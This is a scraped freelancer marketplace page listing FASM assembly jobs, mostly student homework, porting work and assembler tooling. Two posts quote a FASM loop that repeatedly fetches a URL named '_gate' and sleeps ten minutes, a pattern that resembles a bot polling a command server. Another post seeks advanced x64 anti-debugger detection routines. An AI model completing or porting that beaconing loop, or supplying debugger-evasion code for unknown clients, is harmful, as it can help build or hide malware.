Fasm project trabalhos

Filtro

Minhas pesquisas recentes
Filtrar por:
Orçamento
para
para
para
Tipo
Habilidades
Idiomas
    Estado do Trabalho
    54 fasm project trabalhos encontrados, preços em EUR

    Дана квадратная матрица порядка M. Заменить нулями элементы, лежащие одновременно выше/ниже главной диагонали (включая эту диагональ) и выше/ниже побочной диагонали (также включая эту диагональ). Пользователь вводит строку, состоящую из слов, разделенных символом пробела, удалить из строки первое слово, вывести строку на экран. Можно использовать FASM, MASM, и тд. или классический ассемблер.

    €9 - €28
    €9 - €28
    0 ofertas

    I have an application made for 32 bits. Now I would like have 64 bits support. The code is *.asm and is compiled under fasm. Can you help me convert/adding support for 64-bits support. I would like future communication under TEAMS(microsoft) Under the progress, I require daily, small, efficient communication between you and me if else nothing else is decided between us.

    €200 (Avg Bid)
    €200 Média
    4 ofertas

    Using the flat assembler (fasm), write a program that converts an 8-bit integer to binary and hexadecimal using bitwise operators. Do not use external functions. You may use the algorithm below. Ask user to enter a number 0 - 255 and store into Num Algorithm to convert Value to binary: (1) Set Count to 0. Move Num into a variable named Temp (2) Move Temp into EAX then AND EAX with 128 (binary 10000000) (3) if result is zero, output "0" (4) if result is not zero, output "1" (5) shift Temp left one digit (6) increment Count (7) if Count < 8, jump to step (2) Algorithm to convert Value to hexadecimal: (1) Move Num into a variable named Temp (2) shift Temp right 4 digits to isolate left 4 digits (3) if Temp <=9, print Temp (4) if Temp >=10, add 55 to Temp...

    €23 (Avg Bid)
    €23 Média
    9 ofertas

    Using the flat assembler (fasm), write a program that plays tic-tac-toe against the computer. Below is a sample game loop. It assumes the player is X and computer is O with the player making the first move. gameLoop: call printBoard cinvoke printf, "Your move (1-9)? " cinvoke scanf, "%d", Square call placeX call checkXWin call checkForDraw call computerMove call checkOWin jmp gameLoop For the computerMove, you could simply place an O in the first available square, select a random square, or do these steps: 1. check if computer "O" can win else 2. check if computer can block player "X" from winning else 3. select a random square to move into Example output Wel...

    €32 (Avg Bid)
    €32 Média
    2 ofertas

    Using the flat assembler (fasm), write a program that plays tic-tac-toe against the computer. Below is a sample game loop. It assumes the player is X and computer is O with the player making the first move. gameLoop: call printBoard cinvoke printf, "Your move (1-9)? " cinvoke scanf, "%d", Square call placeX call checkXWin call checkForDraw call computerMove call checkOWin jmp gameLoop For the computerMove, you could simply place an O in the first available square, select a random square, or do these steps: 1. check if computer "O" can win else 2. check if computer can block player "X" from winning else 3. select a random square to move into Example output Welcome to x86 Assembly Tic-tac-toe! You will be X's and the computer will be ...

    €13 (Avg Bid)
    €13 Média
    2 ofertas

    Using the flat assembler (fasm), write a program that plays tic-tac-toe against the computer. Below is a sample game loop. It assumes the player is X and computer is O with the player making the first move. gameLoop: call printBoard cinvoke printf, "Your move (1-9)? " cinvoke scanf, "%d", Square call placeX call checkXWin call checkForDraw call computerMove call checkOWin jmp gameLoop For the computerMove, you could simply place an O in the first available square, select a random square, or do these steps: 1. check if computer "O" can win else 2. check if computer can block player "X" from winning else 3. select a random square to move into Example output Wel...

    €31 (Avg Bid)
    €31 Média
    7 ofertas

    Using the flat assembler (fasm), write a program that plays tic-tac-toe against the computer. Below is a sample game loop. It assumes the player is X and computer is O with the player making the first move. gameLoop: call printBoard cinvoke printf, "Your move (1-9)? " cinvoke scanf, "%d", Square call placeX call checkXWin call checkForDraw call computerMove call checkOWin jmp gameLoop For the computerMove, you could simply place an O in the first available square, select a random square, or do these steps: 1. check if computer "O" can win else 2. check if computer can block player "X" from winning else 3. select a random square to move into Example output We...

    €113 (Avg Bid)
    €113 Média
    6 ofertas

    Using the flat assembler (fasm), write a program that converts an 8-bit integer to binary and hexadecimal using bitwise operators. Do not use external functions. You may use the algorithm below. Need Output to Look like: This x86 assembly program converts an integer to binary and hex. Enter an integer from 0 - 255: 73 Binary: 01001001 Hex: 49

    €17 (Avg Bid)
    €17 Média
    5 ofertas

    Using the flat assembler (fasm), write a program that plays tic-tac-toe against the computer. Below is a sample game loop. It assumes the player is X and computer is O with the player making the first move.

    €37 (Avg Bid)
    €37 Média
    4 ofertas

    Using the flat assembler (fasm), write a program that reads in a string of various parentheses, brackets, and braces. Output whether or not the parentheses, brackets, and braces are balanced.

    €18 (Avg Bid)
    €18 Média
    2 ofertas

    Using the flat assembler (fasm), write a program that converts an integer from -100 to 100 to text.

    €9 - €28
    €9 - €28
    0 ofertas

    Using the flat assembler (fasm), write a program that converts an 8-bit integer to binary and hexadecimal using bitwise operators. Do not use external functions. You may use the algorithm below.

    €23 (Avg Bid)
    €23 Média
    1 ofertas

    Using the flat assembler (fasm), write an x86 assembly program that outputs four random numbers from 1-10 with no duplicates. Next, output a random inspirational quote (out of at least 5).

    €18 (Avg Bid)
    €18 Média
    3 ofertas

    Submit the .asm source code file on Ecampus under the "Submit Homework" menu option. Using the flat assembler (fasm), write an x86 assembly program that outputs four random numbers from 1-10 with no duplicates. Next, output a random inspirational quote (out of at least 5). Example outputs Here are four distinct (not duplicate) random numbers from 1-10: 8 3 9 1 May the fourth be with you!

    €18 (Avg Bid)
    €18 Média
    2 ofertas

    I need to get a FASM assembly code written on insertion sort using binary search. Only those freelancers with good knowledge of FASM will be considered.

    €25 (Avg Bid)
    €25 Média
    2 ofertas

    You have to convert a simple Masm code to Fasm. You can also write the Fasm code on your own as the topic is rather simple. It might take you few hours.

    €21 (Avg Bid)
    €21 Média
    3 ofertas

    Develop a program that solves the problem of finding pairs of perpendicular segments from N = 4 segments defined by the coordinates of the end points. The program should be developed for 32-bit architectures of the Intel processor in the Windows OS environment (check - running * .EXE file in this OS) and successfully compiled by the FASM compiler. For parsing the command line it is convenient to use the ssanf procedure (if the value of the first argument is not significant, it is useful to skip its assignment field using the form “% *”). To ensure protection against incorrectly formed command line, the use of the default values ​​of input parameters should be provided. To run the application with the command line, it is necessary to create at least two command (packa...

    €18 (Avg Bid)
    €18 Média
    2 ofertas

    Task attached under the post. Real bids 50 euros

    €29 (Avg Bid)
    €29 Média
    2 ofertas

    I will need a freelancer to write really small project in 1.5 hours!

    €20 (Avg Bid)
    €20 Média
    1 ofertas

    This l... As the name implies all it does is read a certain amount of bits ('n bits') from a stream (ie 3 bits or 12 bits etc -- any number from 1 to 32), and it maintains an internal state so it's able to keep following the stream along to correctly output 'n bits' until the end of the stream. (It's a "bitstream" reader) I just need you to make a simple demo using either gcc or fasm/masm that demonstrates how to call it. Just a console app, nothing fancy, just a simple demonstration. For example the demo might use a buffer of say 15 bytes, and call getbits(10) over and over to read and printf() 10 bits at a time (into a 16 or 32bit 'holder' int) until end of the buffer. I look forward to working with you! Please include a br...

    €52 (Avg Bid)
    €52 Média
    7 ofertas

    ...srcwinter [C_FILES] srcbuypurchase.c --> file1.h srcsellsell.c --> file1.h [FASM_FILES] srcfasm --> srcfasm --> [MASM_FILES] srcmasm --> incmasm incmasm srcmasm 5) The output file "sources" is generated as followed according the the above input file: # ------------------------------- # File generated automatically. Do not edit # ------------------------------- CPP_FILES= srcpool srcpool srcwinter C_FILES= srcbuypurchase.c srcsellsell.c FASM_FILES= srcfasm srcfasm MASM_FILES= srcmasm srcmasm 6) In the output file ""

    €125 (Avg Bid)
    Urgente
    €125 Média
    19 ofertas

    I need a developer who is good in assembly. In MASM and FASM in precise.

    €397 (Avg Bid)
    €397 Média
    5 ofertas

    Requires: Software development on the assembler (MASM, FASM). Adjustment programs designed to (MASM, FASM). Requirements: Knowledge of systems - of Windows. Language Programming - Assembler (MASM, FASM). Debugging tools - OllyDbg. Technical skills: Good knowledge and understanding of the concepts of object-oriented programming (OOP) and design patterns. The ability to understand someone else's code. The ability to write high-quality, well-structured code. Basic knowledge of the operation of computer networks and network protocols. Conditions: Agreed payment for each execution of the job. Project delivery within the specified time.

    €1392 (Avg Bid)
    €1392 Média
    7 ofertas

    Requires: Software development on the assembler (MASM, FASM). Adjustment programs designed to (MASM, FASM). Requirements: Knowledge of systems - of Windows. Language Programming - Assembler (MASM, FASM). Debugging tools - OllyDbg. Technical skills: Good knowledge and understanding of the concepts of object-oriented programming (OOP) and design patterns. The ability to understand someone else's code. The ability to write high-quality, well-structured code. Basic knowledge of the operation of computer networks and network protocols. Conditions: Agreed payment for each execution of the job. Project delivery within the specified time.

    €230 - €690
    €230 - €690
    0 ofertas

    Requires: Software development on the assembler (MASM, FASM). Adjustment programs designed to (MASM, FASM). Requirements: Knowledge of systems - of Windows. Language Programming - Assembler (MASM, FASM). Debugging tools - OllyDbg. Technical skills: Good knowledge and understanding of the concepts of object-oriented programming (OOP) and design patterns. The ability to understand someone else's code. The ability to write high-quality, well-structured code. Basic knowledge of the operation of computer networks and network protocols. Conditions: Agreed payment for each execution of the job. Project delivery within the specified time.

    €1457 (Avg Bid)
    €1457 Média
    2 ofertas

    Explanation is on the file below. This is to be done on x86 not x64 and should be explained detailed.

    €18 - €18
    €18 - €18
    0 ofertas

    I have an image attached showing all the things i basically a few programs in assembly drawing some geometric figures.

    €30 (Avg Bid)
    €30 Média
    3 ofertas

    Hi. I have an image attached showing all the things i basically a few programs in assembly drawing some geometric figures. I need this quickly. Before Thursday 14:00 gmt would be perfect.

    €85 (Avg Bid)
    €85 Média
    4 ofertas

    Hi. I have an image attached showing all the things i basically a few programs in assembly drawing some geometric figures. I need this quickly. Before Thursday 14:00 gmt would be perfect.

    €28 - €28
    €28 - €28
    0 ofertas

    Hi. I have an image attached showing all the things i basically a few programs in assembly drawing some geometric figures. I need this quickly. Before Thursday 14:00 gmt would be perfect.

    €28 (Avg Bid)
    €28 Média
    1 ofertas

    Hi. I have an image attached showing all the things i basically a few programs in assembly drawing some geometric figures. I need this quickly. Before Thursday 14:00 gmt would be perfect.

    €23 - €28
    €23 - €28
    0 ofertas
    Yazılım Üret Encerrado left

    Merhabalar. Projede yapılmasını istediğim şeyler şunlar: Emu8086'yı daha evvel kullandıysanız, onun kadar kapsamlı değil ancak ona benzer bir proje olacak. Bir metin editörüne a...kullandıysanız, onun kadar kapsamlı değil ancak ona benzer bir proje olacak. Bir metin editörüne assembly kodları yazılacak, sonra kullanıcı compile veya run butonlarına basarak uygulamayı çalıştıracak. Adım adım çalıştırmak isterse 1 adım geri al, 1 adım ileri git gibi komutlar da bulunacak. Output bölümü ve yazmaç değerlerinin bulunduğu bölüm de olacak. Projede yeni bir derleyici yazılması gerekmiyor. FASM, MASM, NASM... hangisi olursa olsun sorun değil, yeter ki 32/64 bit tüm bilgisayarlarda çalışabilsin. Bund...

    €561 (Avg Bid)
    €561 Média
    2 ofertas

    ...operands_info...) which is similar (but less complex) to the one that udis86 creates when it disassembles a x86/x64 instruction. The project consists in 2 parts: 1) Convert from udis86 structure (from a decoded instruction) to my own structure (let's call it INSTR_INFO) 2) Giving a INSTR_INFO structure, you create (assemble) the machine instruction (x86/x64) according to the instruction information in the structure. I require that you make a direct conversion to machine code, I mean, I don't allow that you convert the structure to a string representing the assembly instruction and you later call YASM/FASM/etc. to generate the assembled instruction. I require the project to be developed in C or C++ under Visual Studio. If you need more inform...

    €368 (Avg Bid)
    Urgente
    €368 Média
    1 ofertas

    ...operands_info...) which is similar (but less complex) to the one that udis86 creates when it disassembles a x86/x64 instruction. The project consists in 2 parts: 1) Convert from udis86 structure (from a decoded instruction) to my own structure (let's call it INSTR_INFO) 2) Giving a INSTR_INFO structure, you create (assemble) the machine instruction (x86/x64) according to the instruction information in the structure. I require that you make a direct conversion to machine code, I mean, I don't allow that you convert the structure to a string representing the assembly instruction and you later call YASM/FASM/etc. to generate the assembled instruction. I require the project to be developed in C or C++ under Visual Studio. If you need more inform...

    €445 (Avg Bid)
    Urgente
    €445 Média
    7 ofertas

    I need this converted to MASM, needs to be done in a few hours urgently, I might also need help implementing into my project, if so I will pay additionally. format PE GUI 4.0 entry start include '..include' b equ byte section '.code' code readable executable start: invoke InternetOpen,_agent,0,0,0,0 test eax,eax jz _exit mov [InternetHandle],eax invoke InternetOpenUrl,eax,_gate,0,0,0,0 test eax,eax jz _exit mov [FileHandle],eax invoke InternetReadFile,eax,FileBuffer,1023,BytesRead test eax,eax jz _exit mov eax,[BytesRead] mov b[FileBuffer+eax],0 invoke Sleep,600000 invoke InternetCloseHandle,[FileHandle] invoke InternetCloseHandle,[InternetHandle] jmp start _exit: invoke InternetCloseHandle,[FileHandle] invoke InternetClose...

    €46 (Avg Bid)
    €46 Média
    1 ofertas
    Convert FASM to MASM Encerrado left

    I need this converted to MASM, needs to be done in a few hours. format PE GUI 4.0 entry start include '..include' b equ byte section '.code' code readable executable start: invoke InternetOpen,_agent,0,0,0,0 test eax,eax jz _exit mov [InternetHandle],eax invoke InternetOpenUrl,eax,_gate,0,0,0,0 test eax,eax jz _exit mov [FileHandle],eax invoke InternetReadFile,eax,FileBuffer,1023,BytesRead test eax,eax jz _exit mov eax,[BytesRead] mov b[FileBuffer+eax],0 invoke Sleep,600000 invoke InternetCloseHandle,[FileHandle] invoke InternetCloseHandle,[InternetHandle] jmp start _exit: invoke InternetCl...

    €28 - €28
    €28 - €28
    0 ofertas

    I need some simple functions written and implemented into my Kiosk APP. This has to be done in FASM. You will provide these functions + implementing instructions into my current project. 1. Make the application un-closeable e.g disable Alt+F4 2. Set the application to always on top, even if alt+tabbed it needs to instantly switch back to the kiosk app. 3. Write an example of registry editing, which I can easily extend to add additional values that I want to edit. Plus 1 or 2 more small functions. This project has to be done in 2 days MAX.

    €195 (Avg Bid)
    €195 Média
    4 ofertas

    Fasm (Fpu)? Program running on Windows XP with an AMD chipset Hello my name is Ryan, I work in the field of independent research and I have the need for a 1 FASM executable (.exe) and source file with rights that in a brief summary: Please See attached InfoGraphic file for details. I would need the full rights to this code in FASM including source. Looking to establish future projects of the same caliber. Questions comments or concerns? Thanks RB

    €37 (Avg Bid)
    €37 Média
    1 ofertas

    Hi! I need an experienced assembler programmer to write, compile to a working DLL and provide the created source code for 5 subroutines (aka. functions that don't return a value). Preferably the code should work with FASM. The DLL will be used in Visual Basic 6 on the Windows Platform on 32bit and 64bit platforms, and will pass long values (I believe these are known as signed integers - please check) as parameters to the subroutines. The DLL must use the calling convention (I believe its stdcall - please check) needed by Visual Basic 6 applications. The routines need to be as fast as possible, hence they will be coded in assembler. I presume taking advantage of an instruction set like MMX or SSE2 is the way to go, but you would be the one to tell me. The routin...

    €147 (Avg Bid)
    €147 Média
    7 ofertas

    Por favor, Cadastre-se ou Faça Login para ver os detalhes.

    Tempo Integral

    Hello Coders! There is a tool called "pecvt" which adds debug information to OBJ files created with FASM. You just need to generate symbold when assembling with FASM (.FAS file) and use it with "pecvt". "pecvt" works fine adding all debug information to the FASM OBJ (you can debug in source code level with WindDBG). The only problem is that information for "local" variables and "parameters" in procedurers (proc) are not inserted in the generated OBJ (global data, etc, is added correctly though) Attached you have the "pecvt" to modify the code (written in C) and a FASM example which just generate a COFF OBJ. You can check that after applying "pecvt" to that FASM OBJ, you c...

    €116 (Avg Bid)
    €116 Média
    1 ofertas

    Dear Coders, I have a small source code in FASM (about 300 lines of code) which is not compiling correctly with latest FASM. 1) I need to make that code compilable under latest FASM version. 2) I also need that code to be transformed into 64-bit assembly also under FASM. So, it can also generate a 64-bit Windows binary. If you are interested, just let me know to received the FASM code snippet. Thanks, A. ## Deliverables 1) All deliverables will be considered "work made for hire" under U.S. Copyright law. Employer will receive exclusive and complete copyrights to all work purchased. (No 3rd party components unless all copyright ramifications are explained AND AGREED TO by the employer on the site per the worker&#...

    €90 (Avg Bid)
    €90 Média
    4 ofertas

    Hello Coders, I need some routines to dected a debugger for Windows 64-bit. That is, x64 debuggers (WinDbg, IDA, FDBG...) The common FindWindow tricks are not allowed, I need more "advanced" antidebugger detect...need some routines to dected a debugger for Windows 64-bit. That is, x64 debuggers (WinDbg, IDA, FDBG...) The common FindWindow tricks are not allowed, I need more "advanced" antidebugger detections. The solution must be coded in FASM (asm) compiled in 64-bit. The coder will deliver a set of functions like: CheckDebugger1() --> returns 1 if debugger found with method 1 CheckDebugger2() --> returns 1? ? if debugger found with method 2 ... ... Please, let? me know how many antidebugger methods you can implemen...

    €119 (Avg Bid)
    €119 Média
    2 ofertas

    please look at attachment for instructions. Please ask questions if u dont understand. Also, please be cl...Please ask questions if u dont understand. Also, please be clear with documentation. For each function please state what its doing in order of the attached document. You have to use either FASM or MASM. I require the .ASM souce code. The program can remain in dos, i dont require any windows GUI. The simpler the code the better, i dont require no fanciness or shortcuts to complicate me from understanding the pro-gramme. It should be easy to understand and follow. I have to explain this code to others so it has to be as simplified as possible. This is very simple programme. My budget for this project is $5.00. Again, Please ask questions if u dont under...

    €46 (Avg Bid)
    €46 Média
    9 ofertas

    Alex, as we discussed in the email, this is for adding bulk conversion plus multi-threading support.

    €322 (Avg Bid)
    €322 Média
    1 ofertas

    Alex, As discussed, we need to add the padding and cropping features to both the 32 bit and the 64 bit libraries.

    €92 (Avg Bid)
    €92 Média
    2 ofertas

    Hi Alex, As we discussed, this is for the library porting work.

    €138 (Avg Bid)
    €138 Média
    1 ofertas

    Project for fasm only: As discussed: Add audio resample operation feature to ffconvert for flv conversion. Resample would kick in only if the input sample rate is not supported by the flv container.

    €130 (Avg Bid)
    €130 Média
    3 ofertas

    Hi Fasm I am sorry for late response but now we badly need you! Please Bid again so I can write you on your PMB about the same Video App Project Thanks, PB.

    €1107 (Avg Bid)
    €1107 Média
    3 ofertas

    I want to provide LIVE stream over the web, protect it and allow viewers (subscribers to the live stream) to record or schedule recording of the stream. Here is an overall summary of the project. I want a custom player application that a client on my website would download in order to be able to view our live feed video. Through this application, user will be able to choose and view live feed video, record live or schedule recording OR view previously recorded video. Live video stream will be coming from our CDN in windows or flash format (most likely windows). This is how it would work 1. User opens the application and logs in. (We already have a shopping cart and a website where user will be able to purchase subscriptions and can be authenticated, so this would ...

    €690 - €1380
    Secreto
    €690 - €1380
    2 ofertas